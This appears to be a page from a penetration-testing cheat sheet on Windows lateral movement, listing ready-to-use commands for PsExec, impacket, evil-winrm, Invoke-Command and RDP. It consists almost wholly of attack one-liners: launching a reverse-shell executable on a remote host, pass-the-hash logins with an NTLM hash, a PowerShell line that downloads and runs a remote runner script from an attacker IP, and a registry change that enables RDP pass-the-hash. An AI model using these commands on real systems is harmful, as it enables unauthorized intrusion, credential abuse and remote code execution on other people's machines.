Remote Access

PsExec64

  • Local SYSTEM

paexec.exe -s -i cmd

  • Remote Login

.\PsExec64.exe -accepteula \\file01.domain.COM C:\reverse-shell.exe

psexec

python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [RED/]pete@192.168.y.z

python3 impacket/example/psexec.py -k -no-pass da@reddc.red.com cmd

WinRM

evil-winrm -i 172.16.y.z -u [red.com\\]jim -p Passw0rd

evil-winrm -i 192.168.y.z -u kevin -H [hash]

invoke-command -computername redwebaw.red.com -scriptblock {cmd /c "powershell -exec  bypass -nop iex (new-object net.webclient).downloadstring('http://192.168.x.y/runner64.txt')"}

RDP

  • Password Authentication

xfreerdp /u:Administrator /p:lab [/d:red.com] /cert:ignore  //v:192.168.y.z/dynamic-resolution

  • PTH

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

xfreerdp /v:192.168.y.z /u:bill /pth:[hash] /d:red.com /dynamic-resolution
PreviousPass the HashNextPost Exploitation

Last updated